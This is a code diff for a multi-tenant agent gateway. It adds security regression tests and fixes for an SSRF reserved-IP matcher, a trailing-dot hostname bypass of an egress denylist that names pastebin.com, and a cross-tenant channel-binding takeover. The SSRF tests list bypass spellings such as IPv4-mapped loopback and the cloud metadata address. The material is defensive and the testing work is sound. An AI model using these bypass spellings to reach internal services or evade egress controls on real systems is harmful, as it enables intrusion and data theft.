+ * keyed on window_start) never trip. The ONLY shared column across the
+ * concurrent inserts is the allocated `id`, so a failure isolates the PK race
+ * the advisory lock is meant to prevent.
+ */
+
+import { beforeEach, describe, expect, it } from 'vitest';
+import type { Env } from '../../../index';
+import { generateWindowToken } from '../../../utils/jwt';
+import { manageWatchers } from '../../../tools/admin/manage_watchers';
+import type { ToolContext } from '../../../tools/registry';
+import { cleanupTestDatabase, getTestDb } from '../../setup/test-db';
+import { createTestAgent, createTestEntity } from '../../setup/test-fixtures';
+import { TestWorkspace } from '../../setup/test-mcp-client';
+
+const TEST_ENV = { JWT_SECRET: 'test-jwt-secret-for-testing-only' } as Env;
+
+function ownerCtx(workspace: Awaited<ReturnType<typeof TestWorkspace.create>>): ToolContext {
+  return {
+    organizationId: workspace.org.id,
+    userId: workspace.users.owner.id,
+    memberRole: 'owner',
+    agentId: null,
+    isAuthenticated: true,
+    clientId: null,
+    scopes: ['mcp:read', 'mcp:write', 'mcp:admin'],
+    tokenType: 'oauth',
+    scopedToOrg: true,
+    allowCrossOrg: false,
+  } as ToolContext;
+}
+
+describe('rollup complete_window id allocation race', () => {
+  beforeEach(async () => {
+    await cleanupTestDatabase();
+  });
+
+  it('serializes concurrent rollup completions (no watcher_windows PK collision)', async () => {
+    const sql = getTestDb();
+    const workspace = await TestWorkspace.create({ name: 'Rollup Race Org' });
+    const ownerUserId = workspace.users.owner.id;
+
+    const entity = await createTestEntity({
+      name: 'Rollup Entity',
+      organization_id: workspace.org.id,
+      created_by: ownerUserId,
+    });
+    const agent = await createTestAgent({
+      organizationId: workspace.org.id,
+      ownerUserId,
+      agentId: 'rollup-agent',
+      name: 'Rollup Agent',
+    });
+
+    const watcher = (await workspace.owner.watchers.create({
+      entity_id: entity.id,
+      slug: 'rollup-watcher',
+      name: 'Rollup Watcher',
+      prompt: 'Summarize {{entities}}.',
+      extraction_schema: {
+        type: 'object',
+        properties: { summary: { type: 'string' } },
+        required: ['summary'],
+      },
+      schedule: '0 9 * * *',
+      agent_id: agent.agentId,
+    })) as { watcher_id: string };
+    const watcherId = Number(watcher.watcher_id);
+
+    // Two leaf windows to act as the rollup's source_window_ids. These also
+    // ensure MAX(id) is non-zero before the concurrent rollup inserts start.
+    const leafIds: number[] = [];
+    for (let i = 0; i < 2; i++) {
+      const start = new Date(Date.UTC(2026, 0, 1 + i)).toISOString();
+      const end = new Date(Date.UTC(2026, 0, 2 + i)).toISOString();
+      const [row] = await sql`
+        INSERT INTO watcher_windows (
+          watcher_id, granularity, window_start, window_end,
+          extracted_data, content_analyzed, model_used, run_metadata, created_at
+        ) VALUES (
+          ${watcherId}, 'daily', ${start}, ${end},
+          ${sql.json({ summary: `leaf ${i}` })}, 0, 'test', ${sql.json({})}, NOW()
+        )
+        RETURNING id
+      `;
+      leafIds.push(Number(row.id));
+    }
+
+    // N concurrent rollup completions, each on a DISTINCT (window_start,
+    // granularity) so only the allocated PK `id` can collide. With the bug,
+    // the advisory lock releases before each INSERT and several callers
+    // compute the same MAX(id)+1 → 23505 unique_violation on the PK.
+    const N = 12;
+    const ctx = ownerCtx(workspace);
+    const completions = await Promise.allSettled(
+      Array.from({ length: N }, async (_unused, i) => {
+        const start = new Date(Date.UTC(2026, 1, 1 + i)).toISOString();
+        const end = new Date(Date.UTC(2026, 1, 8 + i)).toISOString();
+        const token = await generateWindowToken(
+          {
+            watcher_id: watcherId,
+            window_start: start,
+            window_end: end,
+            granularity: `weekly-${i}`,
+            content_count: 0,
+            content_ids: [],
+            is_rollup: true,
+            source_window_ids: leafIds,
+            depth: 1,
+          },
+          TEST_ENV
+        );
+        return manageWatchers(
+          {
+            action: 'complete_window',
+            watcher_id: String(watcherId),
+            window_token: token,
+            extracted_data: { summary: `rollup ${i}` },
+          } as never,
+          TEST_ENV,
+          ctx
+        );
+      })
+    );
+
+    const rejected = completions.filter((r) => r.status === 'rejected');
+    const rejectionMessages = rejected.map((r) =>
+      r.status === 'rejected'
+        ? r.reason instanceof Error
+          ? r.reason.message
+          : String(r.reason)
+        : ''
+    );
+    expect(rejectionMessages).toEqual([]);
+
+    // Every rollup must have landed with a unique id.
+    const windowIds = completions
+      .filter((r): r is PromiseFulfilledResult<{ window_id: number }> => r.status === 'fulfilled')
+      .map((r) => Number(r.value.window_id));
+    expect(windowIds).toHaveLength(N);
+    expect(new Set(windowIds).size).toBe(N);
+
+    const stored = await sql`
+      SELECT id FROM watcher_windows
+      WHERE watcher_id = ${watcherId} AND is_rollup = true
+    `;
+    expect(stored).toHaveLength(N);
+    const storedIds = stored.map((row) => Number(row.id));
+    expect(new Set(storedIds).size).toBe(N);
+  });
+});

--- a/packages/server/src/gateway/__tests__/proxy-hardening.test.ts
+++ b/packages/server/src/gateway/__tests__/proxy-hardening.test.ts
@@ -1016,3 +1016,50 @@ describe("EgressJudge — additional behavioral coverage", () => {
     expect(d.source).toBe("judge-error"); // not "circuit-open"
   });
 });
+
+// Regression: in unrestricted+blocklist mode (WORKER_ALLOWED_DOMAINS=* with a
+// WORKER_DISALLOWED_DOMAINS list), a trailing-dot FQDN (`pastebin.com.`) used to
+// slip past the denylist — it matched neither the exact nor the `.suffix`
+// pattern — while `pastebin.com` was correctly blocked. DNS resolves both
+// identically, so this defeated the operator egress control. checkDomainAccess
+// now canonicalizes the hostname (strips trailing dots) before matching.
+describe("egress denylist — trailing-dot FQDN canonicalization", () => {
+  const prevAllowed = process.env.WORKER_ALLOWED_DOMAINS;
+  const prevDisallowed = process.env.WORKER_DISALLOWED_DOMAINS;
+
+  beforeEach(() => {
+    process.env.WORKER_ALLOWED_DOMAINS = "*";
+    process.env.WORKER_DISALLOWED_DOMAINS = "pastebin.com";
+    __testOnly.reset();
+  });
+
+  afterEach(() => {
+    if (prevAllowed === undefined) delete process.env.WORKER_ALLOWED_DOMAINS;
+    else process.env.WORKER_ALLOWED_DOMAINS = prevAllowed;
+    if (prevDisallowed === undefined) delete process.env.WORKER_DISALLOWED_DOMAINS;
+    else process.env.WORKER_DISALLOWED_DOMAINS = prevDisallowed;
+    __testOnly.reset();
+  });
+
+  test("blocks a denylisted host written with a trailing dot", async () => {
+    expect(
+      (await __testOnly.checkDomainAccess("pastebin.com", undefined, undefined)).allowed
+    ).toBe(false);
+    // The bug: this returned allowed:true before the canonicalization fix.
+    expect(
+      (await __testOnly.checkDomainAccess("pastebin.com.", undefined, undefined)).allowed
+    ).toBe(false);
+    expect(
+      (await __testOnly.checkDomainAccess("pastebin.com..", undefined, undefined)).allowed
+    ).toBe(false);
+  });
+
+  test("still allows a non-denylisted host (trailing dot or not) in unrestricted mode", async () => {
+    expect(
+      (await __testOnly.checkDomainAccess("example.com", undefined, undefined)).allowed
+    ).toBe(true);
+    expect(
+      (await __testOnly.checkDomainAccess("example.com.", undefined, undefined)).allowed
+    ).toBe(true);
+  });
+});

--- a/packages/server/src/gateway/__tests__/ssrf-guard-matcher.test.ts
+++ b/packages/server/src/gateway/__tests__/ssrf-guard-matcher.test.ts
@@ -1,0 +1,55 @@
+import { describe, expect, test } from "bun:test";
+import { isReservedIp } from "../proxy/ssrf-guard.js";
+
+// The previous hand-rolled isReservedIp checked only ::1, fc/fd, 127/8, 10/8,
+// 172.16/12, 192.168/16, 169.254/16. These pin the ranges/spellings it MISSED
+// (the SSRF bypass surface) plus the ones it already caught.
+describe("isReservedIp — hardened matcher", () => {
+  test("newly-covered IPv4 ranges", () => {
+    expect(isReservedIp("0.0.0.0")).toBe(true); // 0.0.0.0/8
+    expect(isReservedIp("0.1.2.3")).toBe(true);
+    expect(isReservedIp("100.64.0.1")).toBe(true); // CGNAT 100.64/10
+    expect(isReservedIp("198.18.0.1")).toBe(true); // benchmark 198.18/15
+    expect(isReservedIp("169.254.169.254")).toBe(true); // cloud metadata
+  });
+
+  test("newly-covered IPv6 spellings", () => {
+    expect(isReservedIp("::")).toBe(true); // unspecified
+    expect(isReservedIp("fe80::1")).toBe(true); // link-local
+    expect(isReservedIp("ff02::1")).toBe(true); // multicast
+  });
+
+  test("IPv4-mapped IPv6 (dotted + hex) — the classic bypass", () => {
+    expect(isReservedIp("::ffff:127.0.0.1")).toBe(true);
+    expect(isReservedIp("::ffff:7f00:1")).toBe(true);
+    expect(isReservedIp("::ffff:169.254.169.254")).toBe(true);
+    expect(isReservedIp("::ffff:10.0.0.1")).toBe(true);
+  });
+
+  test("zone IDs are stripped before the decision", () => {
+    expect(isReservedIp("fe80::1%eth0")).toBe(true);
+    expect(isReservedIp("::1%lo")).toBe(true);
+  });
+
+  test("ranges the old matcher already caught", () => {
+    expect(isReservedIp("127.0.0.1")).toBe(true);
+    expect(isReservedIp("::1")).toBe(true);
+    expect(isReservedIp("10.0.0.1")).toBe(true);
+    expect(isReservedIp("172.16.0.1")).toBe(true);
+    expect(isReservedIp("192.168.1.1")).toBe(true);
+    expect(isReservedIp("fc00::1")).toBe(true);
+  });
+
+  test("genuine public addresses are permitted", () => {
+    expect(isReservedIp("8.8.8.8")).toBe(false);
+    expect(isReservedIp("1.1.1.1")).toBe(false);
+    expect(isReservedIp("::ffff:8.8.8.8")).toBe(false);
+    expect(isReservedIp("2606:4700:4700::1111")).toBe(false);
+    expect(isReservedIp("172.32.0.1")).toBe(false); // just outside 172.16/12
+  });
+
+  test("a malformed IP literal fails closed; a hostname is left for resolution", () => {
+    expect(isReservedIp("::ffff:zzzz:1")).toBe(true); // looks like IPv6, won't parse
+    expect(isReservedIp("not-an-ip.example.com")).toBe(false); // hostname → resolve later
+  });
+});

--- a/packages/server/src/gateway/channels/__tests__/binding-service-org-scope.test.ts
+++ b/packages/server/src/gateway/channels/__tests__/binding-service-org-scope.test.ts
@@ -1,0 +1,142 @@
+/**
+ * Red→green reproducer: cross-tenant channel-binding takeover.
+ *
+ * Pre-fix the `agent_channel_bindings` uniqueness was GLOBAL —
+ *   UNIQUE (platform, channel_id, team_id)
+ *   + partial UNIQUE (platform, channel_id) WHERE team_id IS NULL
+ * — with no `organization_id` in the key. `createBinding` then did
+ * `ON CONFLICT (...) DO UPDATE SET agent_id = EXCLUDED.agent_id,
+ * organization_id = EXCLUDED.organization_id`. So a second org binding the
+ * SAME platform+channel collided with the first org's row and rewrote its
+ * `organization_id` (and `agent_id`) to itself: a silent cross-tenant
+ * takeover, and org A's binding vanished.
+ *
+ * Post-fix the constraint is org-scoped
+ *   UNIQUE (organization_id, platform, channel_id, team_id)
+ *   + partial UNIQUE (organization_id, platform, channel_id) WHERE team_id IS NULL
+ * the ON CONFLICT targets include `organization_id`, and the SET list no
+ * longer reassigns `organization_id`. Two orgs may now bind the same
+ * platform+channel independently and neither can clobber the other.
+ */
+
+import { afterAll, beforeAll, beforeEach, describe, expect, test } from "bun:test";
+import { getDb } from "../../../db/client.js";
+import {
+  ensureDbForGatewayTests,
+  resetTestDatabase,
+  seedAgentRow,
+} from "../../__tests__/helpers/db-setup.js";
+import { ChannelBindingService } from "../binding-service.js";
+
+describe("ChannelBindingService is org-scoped (no cross-tenant takeover)", () => {
+  const ORG_A = "org-a";
+  const ORG_B = "org-b";
+  const AGENT_A = "agent-a";
+  const AGENT_B = "agent-b";
+  const PLATFORM = "slack";
+  const CHANNEL = "C123";
+
+  beforeAll(async () => {
+    await ensureDbForGatewayTests();
+  });
+
+  beforeEach(async () => {
+    await resetTestDatabase();
+    await seedAgentRow(AGENT_A, { organizationId: ORG_A });
+    await seedAgentRow(AGENT_B, { organizationId: ORG_B });
+  });
+
+  afterAll(async () => {
+    await resetTestDatabase();
+  });
+
+  test("team_id IS NULL: org B binding the same channel cannot steal org A's binding", async () => {
+    const svc = new ChannelBindingService();
+
+    // Org A binds (slack, C123) to its agent.
+    await svc.createBinding(AGENT_A, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_A,
+    });
+    // Org B binds the SAME (slack, C123) to ITS agent. Pre-fix this hit the
+    // global partial-unique index and rewrote org A's row to org B.
+    await svc.createBinding(AGENT_B, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_B,
+    });
+
+    // Org A's binding must survive untouched.
+    const aBinding = await svc.getBinding(PLATFORM, CHANNEL, undefined, ORG_A);
+    expect(aBinding?.agentId).toBe(AGENT_A);
+
+    // Org B has its own, independent binding.
+    const bBinding = await svc.getBinding(PLATFORM, CHANNEL, undefined, ORG_B);
+    expect(bBinding?.agentId).toBe(AGENT_B);
+
+    // Two distinct rows exist, each owned by its own org — no row was
+    // reassigned across tenants.
+    const sql = getDb();
+    const rows = await sql`
+      SELECT organization_id, agent_id FROM agent_channel_bindings
+      WHERE platform = ${PLATFORM} AND channel_id = ${CHANNEL} AND team_id IS NULL
+      ORDER BY organization_id
+    `;
+    expect(rows.length).toBe(2);
+    expect(rows[0].organization_id).toBe(ORG_A);
+    expect(rows[0].agent_id).toBe(AGENT_A);
+    expect(rows[1].organization_id).toBe(ORG_B);
+    expect(rows[1].agent_id).toBe(AGENT_B);
+  });
+
+  test("team_id set: org B binding the same channel/team cannot steal org A's binding", async () => {
+    const svc = new ChannelBindingService();
+    const TEAM = "T999";
+
+    await svc.createBinding(AGENT_A, PLATFORM, CHANNEL, TEAM, {
+      organizationId: ORG_A,
+    });
+    await svc.createBinding(AGENT_B, PLATFORM, CHANNEL, TEAM, {
+      organizationId: ORG_B,
+    });
+
+    const aBinding = await svc.getBinding(PLATFORM, CHANNEL, TEAM, ORG_A);
+    expect(aBinding?.agentId).toBe(AGENT_A);
+
+    const bBinding = await svc.getBinding(PLATFORM, CHANNEL, TEAM, ORG_B);
+    expect(bBinding?.agentId).toBe(AGENT_B);
+
+    const sql = getDb();
+    const rows = await sql`
+      SELECT organization_id, agent_id FROM agent_channel_bindings
+      WHERE platform = ${PLATFORM} AND channel_id = ${CHANNEL} AND team_id = ${TEAM}
+      ORDER BY organization_id
+    `;
+    expect(rows.length).toBe(2);
+    expect(rows[0].organization_id).toBe(ORG_A);
+    expect(rows[1].organization_id).toBe(ORG_B);
+  });
+
+  test("same org re-binding the same channel still updates agent in place (upsert preserved)", async () => {
+    const svc = new ChannelBindingService();
+    const AGENT_A2 = "agent-a2";
+    await seedAgentRow(AGENT_A2, { organizationId: ORG_A });
+
+    await svc.createBinding(AGENT_A, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_A,
+    });
+    // Re-bind within the SAME org to a different agent — must overwrite, not
+    // create a second row.
+    await svc.createBinding(AGENT_A2, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_A,
+    });
+
+    const binding = await svc.getBinding(PLATFORM, CHANNEL, undefined, ORG_A);
+    expect(binding?.agentId).toBe(AGENT_A2);
+
+    const sql = getDb();
+    const rows = await sql`
+      SELECT 1 FROM agent_channel_bindings
+      WHERE organization_id = ${ORG_A} AND platform = ${PLATFORM}
+        AND channel_id = ${CHANNEL} AND team_id IS NULL
+    `;
+    expect(rows.length).toBe(1);
+  });
+});

--- a/packages/server/src/gateway/channels/__tests__/binding-service-org-scope.test.ts
+++ b/packages/server/src/gateway/channels/__tests__/binding-service-org-scope.test.ts
@@ -26,6 +26,7 @@ import {
   resetTestDatabase,
   seedAgentRow,
 } from "../../__tests__/helpers/db-setup.js";
+import { resolveAgentId } from "../../services/platform-helpers.js";
 import { ChannelBindingService } from "../binding-service.js";
 
 describe("ChannelBindingService is org-scoped (no cross-tenant takeover)", () => {
@@ -138,5 +139,37 @@ describe("ChannelBindingService is org-scoped (no cross-tenant takeover)", () =>
         AND channel_id = ${CHANNEL} AND team_id IS NULL
     `;
     expect(rows.length).toBe(1);
+  });
+
+  // Read-path regression: now that two orgs can bind the same channel, the
+  // inbound router (resolveAgentId) MUST scope its getBinding by the inbound
+  // connection's org. Without it the lookup is org-less and routes the message
+  // to whichever tenant's row Postgres returns first — a cross-tenant misroute.
+  test("resolveAgentId routes each org to its OWN agent for a shared channel", async () => {
+    const svc = new ChannelBindingService();
+    await svc.createBinding(AGENT_A, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_A,
+    });
+    await svc.createBinding(AGENT_B, PLATFORM, CHANNEL, undefined, {
+      organizationId: ORG_B,
+    });
+
+    const a = await resolveAgentId({
+      platform: PLATFORM,
+      channelId: CHANNEL,
+      organizationId: ORG_A,
+      channelBindingService: svc,
+    });
+    const b = await resolveAgentId({
+      platform: PLATFORM,
+      channelId: CHANNEL,
+      organizationId: ORG_B,
+      channelBindingService: svc,
+    });
+
+    // Distinct, org-correct agents. Pre-fix (org-less read) both calls return
+    // the same arbitrary row, so they cannot both match their distinct orgs.
+    expect(a?.agentId).toBe(AGENT_A);
+    expect(b?.agentId).toBe(AGENT_B);
   });
 });

--- a/packages/server/src/gateway/channels/binding-service.ts
+++ b/packages/server/src/gateway/channels/binding-service.ts
@@ -93,25 +93,27 @@ export class ChannelBindingService {
       );
     }
     if (teamId) {
-      // The (platform, channel_id, team_id) UNIQUE covers the team-id-set case.
+      // The (organization_id, platform, channel_id, team_id) UNIQUE covers the
+      // team-id-set case. The key is org-scoped so a sibling tenant binding the
+      // same platform+channel can never collide with — and silently take over —
+      // this org's row. `organization_id` is intentionally NOT in the SET list:
+      // a binding must never change owners.
       await sql`
         INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
         VALUES (${orgId}, ${agentId}, ${platform}, ${channelId}, ${teamId}, now())
-        ON CONFLICT (platform, channel_id, team_id) DO UPDATE SET
-          agent_id = EXCLUDED.agent_id,
-          organization_id = EXCLUDED.organization_id
+        ON CONFLICT (organization_id, platform, channel_id, team_id) DO UPDATE SET
+          agent_id = EXCLUDED.agent_id
       `;
     } else {
       // For team_id IS NULL the unique constraint above doesn't fire (PG
-      // treats NULL as distinct). The companion partial unique index
-      // (agent_channel_bindings_no_team_unique) is what we conflict on.
+      // treats NULL as distinct). The companion org-scoped partial unique index
+      // (agent_channel_bindings_org_no_team_unique) is what we conflict on.
       await sql`
         INSERT INTO agent_channel_bindings (organization_id, agent_id, platform, channel_id, team_id, created_at)
         VALUES (${orgId}, ${agentId}, ${platform}, ${channelId}, NULL, now())
-        ON CONFLICT (platform, channel_id)
+        ON CONFLICT (organization_id, platform, channel_id)
           WHERE team_id IS NULL
-          DO UPDATE SET agent_id = EXCLUDED.agent_id,
-            organization_id = EXCLUDED.organization_id
+          DO UPDATE SET agent_id = EXCLUDED.agent_id
       `;
     }
     logger.info(`Created binding: ${platform}/${channelId} → ${agentId}`);

--- a/packages/server/src/gateway/commands/command-dispatcher.ts
+++ b/packages/server/src/gateway/commands/command-dispatcher.ts
@@ -16,6 +16,7 @@ interface CommandDispatchInput {
   isGroup: boolean;
   conversationId?: string;
   connectionId?: string;
+  organizationId?: string;
   reply: CommandContext["reply"];
 }
 
@@ -91,11 +92,14 @@ export class CommandDispatcher {
   }
 
   private async resolveAgentId(input: CommandDispatchInput): Promise<string> {
-    // Check channel binding first (Slack multi-tenant)
+    // Check channel binding first (Slack multi-tenant). Scope to the inbound
+    // org — bindings are org-scoped, so an org-less read could match another
+    // tenant's binding for the same channel.
     const binding = await this.channelBindingService.getBinding(
       input.platform,
       input.channelId,
-      input.teamId
+      input.teamId,
+      input.organizationId
     );
     if (binding?.agentId) {
       return binding.agentId;

--- a/packages/server/src/gateway/connections/__tests__/restart-connection-orgless.test.ts
+++ b/packages/server/src/gateway/connections/__tests__/restart-connection-orgless.test.ts
@@ -1,0 +1,162 @@
+/**
+ * restartConnection persists OUTSIDE org context (multi-replica HIGH bug).
+ *
+ * On a cold pod, an inbound platform event hits the public per-connection
+ * webhook (`/api/v1/webhooks/:id`) or the notification fan-out
+ * (`postMessageToChannel`) — neither carries an HTTP request's ALS org id.
+ * Both lazily warm the connection via `ensureConnectionRunning()` →
+ * `restartConnection()`, whose `persistConnection()` calls route through the
+ * Postgres store's `saveConnection()`, which calls `getOrgId()` and THROWS
+ * when no org context is bound. The throw aborts the restart and the inbound
+ * message/notification is silently dropped.
+ *
+ * These tests seed a connection under its org, then invoke
+ * `restartConnection` with NO orgContext.run() (mirroring the webhook path)
+ * and assert the row is persisted correctly — covering BOTH the success
+ * persist and the startInstance-failure error persist.
+ *
+ * Uses the embedded Postgres gateway test harness; no network (startInstance
+ * is stubbed so we exercise only the org-context-wrapped persistence).
+ */
+
+import { beforeAll, beforeEach, describe, expect, test } from "bun:test";
+import {
+  ensureDbForGatewayTests,
+  resetTestDatabase,
+  seedAgentRow,
+} from "../../__tests__/helpers/db-setup.js";
+
+const TEST_ENCRYPTION_KEY =
+  "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef";
+
+beforeAll(async () => {
+  await ensureDbForGatewayTests();
+  process.env.ENCRYPTION_KEY = TEST_ENCRYPTION_KEY;
+}, 60_000);
+
+beforeEach(async () => {
+  await resetTestDatabase();
+}, 30_000);
+
+async function buildManager() {
+  const { ChatInstanceManager } = await import("../chat-instance-manager.js");
+  const { createPostgresAgentConnectionStore } = await import(
+    "../../../lobu/stores/postgres-stores.js"
+  );
+  const { PostgresSecretStore } = await import(
+    "../../../lobu/stores/postgres-secret-store.js"
+  );
+  const { SecretStoreRegistry } = await import("../../secrets/index.js");
+  const { orgContext } = await import("../../../lobu/stores/org-context.js");
+
+  const connectionStore = createPostgresAgentConnectionStore();
+  const postgresSecretStore = new PostgresSecretStore();
+  const secretStore = new SecretStoreRegistry(postgresSecretStore, {
+    secret: postgresSecretStore,
+  });
+
+  const services = {
+    getPublicGatewayUrl: () => "",
+    getSecretStore: () => secretStore,
+    getConnectionStore: () => connectionStore,
+    getChannelBindingService: () => ({ getBinding: async () => null }),
+    getCommandRegistry: () => undefined,
+  } as any;
+
+  const manager = new ChatInstanceManager() as any;
+  manager.services = services;
+  manager.publicGatewayUrl = "";
+  manager.connectionStore = connectionStore;
+
+  return { manager, connectionStore, orgContext };
+}
+
+/** Seed a Telegram connection (with a secret-ref bot token) in `orgId`. */
+async function seedConnection(
+  connectionStore: any,
+  orgContext: any,
+  args: { orgId: string; agentId: string; connectionId: string }
+): Promise<void> {
+  await seedAgentRow(args.agentId, { organizationId: args.orgId });
+  await orgContext.run({ organizationId: args.orgId }, async () => {
+    await connectionStore.saveConnection({
+      id: args.connectionId,
+      platform: "telegram",
+      agentId: args.agentId,
+      organizationId: args.orgId,
+      config: { platform: "telegram", botToken: "12345:fake-token" },
+      settings: { allowGroups: true },
+      metadata: {},
+      // Start from an errored row so restart's "recover to active" persist runs.
+      status: "error",
+      errorMessage: "previous boot failed",
+      createdAt: Date.now(),
+      updatedAt: Date.now(),
+    });
+  });
+}
+
+describe("restartConnection org-context (multi-replica cold-pod webhook path)", () => {
+  test("restartConnection succeeds and persists active status with NO ambient org context", async () => {
+    const { manager, connectionStore, orgContext } = await buildManager();
+
+    await seedConnection(connectionStore, orgContext, {
+      orgId: "org-A",
+      agentId: "agent-A",
+      connectionId: "conn-A",
+    });
+
+    // Stub the adapter boot so the test is network-free and focuses on the
+    // org-context-wrapped persistence (the boot path is already org-scoped via
+    // startInstance()). Success path: leave status as set by restartConnection.
+    manager.startInstance = async () => {
+      /* no-op success */
+    };
+
+    // No orgContext.run() — mirrors the public /api/v1/webhooks/:id route and
+    // notification fan-out on a cold pod. Before the fix, persistConnection ->
+    // saveConnection -> getOrgId() throws here and the inbound event is dropped.
+    await manager.restartConnection("conn-A");
+
+    // The success persist must have landed the active status, scoped to org-A.
+    const after = await orgContext.run(
+      { organizationId: "org-A" },
+      async () => connectionStore.getConnection("conn-A")
+    );
+    expect(after).not.toBeNull();
+    expect(after.status).toBe("active");
+    expect(after.errorMessage ?? null).toBeNull();
+  });
+
+  test("restartConnection's startInstance-failure error persist also runs org-less", async () => {
+    const { manager, connectionStore, orgContext } = await buildManager();
+
+    await seedConnection(connectionStore, orgContext, {
+      orgId: "org-B",
+      agentId: "agent-B",
+      connectionId: "conn-B",
+    });
+
+    // startInstance fails (e.g. unresolvable secret) — restartConnection must
+    // still persist the error status so the UI reflects it. That persist also
+    // ran org-less before the fix and threw on getOrgId(), masking the real
+    // failure (and the re-thrown error below would be getOrgId's, not ours).
+    manager.startInstance = async (conn: any) => {
+      conn.status = "error";
+      conn.errorMessage = "boot blew up";
+      throw new Error("boot blew up");
+    };
+
+    await expect(manager.restartConnection("conn-B")).rejects.toThrow(
+      "boot blew up"
+    );
+
+    const after = await orgContext.run(
+      { organizationId: "org-B" },
+      async () => connectionStore.getConnection("conn-B")
+    );
+    expect(after).not.toBeNull();
+    expect(after.status).toBe("error");
+    expect(after.errorMessage).toBe("boot blew up");
+  });
+});

--- a/packages/server/src/gateway/connections/chat-instance-manager.ts
+++ b/packages/server/src/gateway/connections/chat-instance-manager.ts
@@ -479,11 +479,13 @@ export class ChatInstanceManager {
     try {
       await this.startInstance(connection);
     } catch (error) {
-      // startInstance sets connection.status = "error" — persist so UI reflects it
-      await this.persistConnection(connection);
+      // startInstance sets connection.status = "error" — persist so UI reflects it.
+      // Bind the connection's owning org so the per-tenant saveConnection() write
+      // succeeds even on the org-less restart paths (see persistConnectionScoped).
+      await this.persistConnectionScoped(connection);
       throw error;
     }
-    await this.persistConnection(connection);
+    await this.persistConnectionScoped(connection);
 
     logger.info({ id }, "Connection restarted");
   }
@@ -491,9 +493,20 @@ export class ChatInstanceManager {
   async stopConnection(id: string): Promise<void> {
     await this.stopInstance(id);
 
-    await this.connectionStore.updateConnection(id, {
-      status: "stopped",
-    });
+    // updateConnection() routes through saveConnection() which requires
+    // getOrgId(); bind the connection's owning org so the stop write succeeds
+    // even when reached without an HTTP request's ALS org context.
+    const stored = await this.connectionStore.getConnection(id);
+    const markStopped = () =>
+      this.connectionStore.updateConnection(id, {
+        status: "stopped",
+      });
+    const orgId = stored?.organizationId;
+    if (orgId) {
+      await orgContext.run({ organizationId: orgId }, markStopped);
+    } else {
+      await markStopped();
+    }
 
     logger.info({ id }, "Connection stopped");
   }
@@ -1196,6 +1209,33 @@ export class ChatInstanceManager {
       ...connection,
       config: persistedConfig,
     });
+  }
+
+  /**
+   * persistConnection() rebound to the connection's owning org context.
+   *
+   * saveConnection() (and the per-org secret-store put() inside
+   * normalizeConfigForStorage()) require getOrgId() from AsyncLocalStorage.
+   * The restart path is reachable WITHOUT an HTTP request's org context —
+   * `ensureConnectionRunning()` is fired from the public per-connection
+   * webhook (`/api/v1/webhooks/:id`) and the notification fan-out
+   * (`postMessageToChannel`) on a cold pod that hasn't warmed the connection.
+   * Without rebinding, getOrgId() throws, the persist aborts, and the inbound
+   * message/notification is dropped (multi-replica). Bind the connection's
+   * own org so the per-tenant write hits the right bucket — mirroring
+   * startInstance()'s self-rebind. Legacy rows without an organizationId fall
+   * through to the caller's context (the global bucket still resolves).
+   */
+  private async persistConnectionScoped(
+    connection: PlatformConnection
+  ): Promise<void> {
+    if (connection.organizationId) {
+      return orgContext.run(
+        { organizationId: connection.organizationId },
+        () => this.persistConnection(connection)
+      );
+    }
+    return this.persistConnection(connection);
   }
 
   /**

--- a/packages/server/src/gateway/connections/message-handler-bridge.ts
+++ b/packages/server/src/gateway/connections/message-handler-bridge.ts
@@ -318,6 +318,7 @@ export class MessageHandlerBridge {
       channelId,
       teamId,
       agentId: this.connection.agentId,
+      organizationId: this.connection.organizationId,
       channelBindingService,
     });
     if (!resolved) {
@@ -441,6 +442,7 @@ export class MessageHandlerBridge {
             isGroup,
             conversationId,
             connectionId: this.connection.id,
+            organizationId: this.connection.organizationId,
             reply: createChatReply((content) => thread.post(content)),
           }
         );
@@ -460,6 +462,7 @@ export class MessageHandlerBridge {
           isGroup,
           conversationId,
           connectionId: this.connection.id,
+          organizationId: this.connection.organizationId,
           reply: createChatReply((content) => thread.post(content)),
         }
       );
@@ -705,6 +708,7 @@ export class MessageHandlerBridge {
       channelId,
       teamId,
       agentId: this.connection.agentId,
+      organizationId: this.connection.organizationId,
       channelBindingService,
     });
     if (!resolved) {

--- a/packages/server/src/gateway/connections/slack-platform-bridge.ts
+++ b/packages/server/src/gateway/connections/slack-platform-bridge.ts
@@ -114,6 +114,7 @@ export function registerSlackPlatformHandlers(
         teamId,
         isGroup: isSlackGroupChannel(rawChannelId),
         connectionId: connection.id,
+        organizationId: connection.organizationId,
         reply,
       }
     );

--- a/packages/server/src/gateway/proxy/http-proxy.ts
+++ b/packages/server/src/gateway/proxy/http-proxy.ts
@@ -144,6 +144,10 @@ async function checkDomainAccess(
 ): Promise<AccessDecision> {
   const global = getGlobalConfig();
 
+  // Canonicalize once so the denylist, allowlist, grant store, and judge all
+  // match the same name (closes the trailing-dot FQDN blocklist bypass).
+  hostname = canonicalizeHostname(hostname);
+
   // Global blocklist always takes precedence
   if (
     global.deniedDomains.length > 0 &&
@@ -395,6 +399,8 @@ let dnsLookupOverride: DnsLookupAllFn | null = null;
 
 export const __testOnly = {
   isBlockedIpAddress,
+  checkDomainAccess,
+  canonicalizeHostname,
   /** Reset cached global config + module-level stores so tests can rebuild them. */
   reset: () => {
     globalConfig = null;
@@ -587,6 +593,19 @@ function validateProxyAuth(req: http.IncomingMessage): ValidatedProxy | null {
  * Check if a hostname matches any domain patterns
  * Supports exact matches and wildcard patterns (.example.com matches *.example.com)
  */
+/**
+ * Canonicalize a hostname for allow/deny/judge matching. WHATWG URL parsing and
+ * the CONNECT host parser both preserve a trailing dot (`evil.com.`), which DNS
+ * resolves identically to `evil.com` but which configured allow/deny/judge
+ * patterns never carry. Without stripping it, a trailing-dot host slips past the
+ * blocklist in unrestricted+blocklist mode (matches neither the exact nor the
+ * `.suffix` pattern) while the plain form is blocked. Strip trailing dots so
+ * every matcher sees the same name DNS will ultimately resolve.
+ */
+function canonicalizeHostname(hostname: string): string {
+  return hostname.replace(/\.+$/, "");
+}
+
 function matchesDomainPattern(hostname: string, patterns: string[]): boolean {
   const lowerHostname = hostname.toLowerCase();
 

